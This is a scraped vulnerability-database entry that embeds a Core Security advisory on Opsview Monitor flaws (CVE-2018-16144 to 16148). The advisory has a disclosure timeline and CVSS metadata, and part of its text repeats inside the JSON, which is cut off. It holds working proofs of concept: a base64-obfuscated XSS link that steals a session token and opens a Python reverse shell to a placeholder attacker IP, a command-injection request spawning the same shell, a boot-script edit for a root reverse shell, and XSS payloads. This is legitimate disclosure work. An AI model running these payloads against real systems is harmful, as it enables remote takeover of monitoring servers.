In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings). Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/
7.5. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/----- /etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
esac
shift
done -----/
/----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root) -----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0903",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16145"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16145",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16145",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-17451",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16145",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16145",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-17451",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-154",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-16145",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance. Opsview Monitor Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a local privilege escalation vulnerability that allows an attacker to gain full control of a device by upgrading its privileges from nagios users to root after the system is restarted. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nVulnerabilities described in 7.1 and 7.2 could be abused to execute\nmalicious JavaScript code in the context of a legitimate user. \nIn addition, issues presented in 7.3 and 7.4 could allow an attacker to\nobtain command execution on the system as the nagios user. \n\n7.1. **Reflected Cross-Site Scripting in Diagnostics**\n\n[CVE-2018-16148] The \u0027diagnosticsb2ksy\u0027 parameter of the \u0027/rest\u0027\nendpoint is vulnerable to Cross-Site Scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. **Persistent Cross-Site Scripting in Settings endpoint**\n\n[CVE-2018-16147] The \u0027data\u0027 parameter of the \u0027/settings/api/router\u0027\nendpoint is vulnerable to Cross-Site Scripting. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. However, this vulnerability can be exploited by\nan attacker to gain persistency and execute the malicious code each time\nthe victim accesses to the settings section. \nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. \n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: 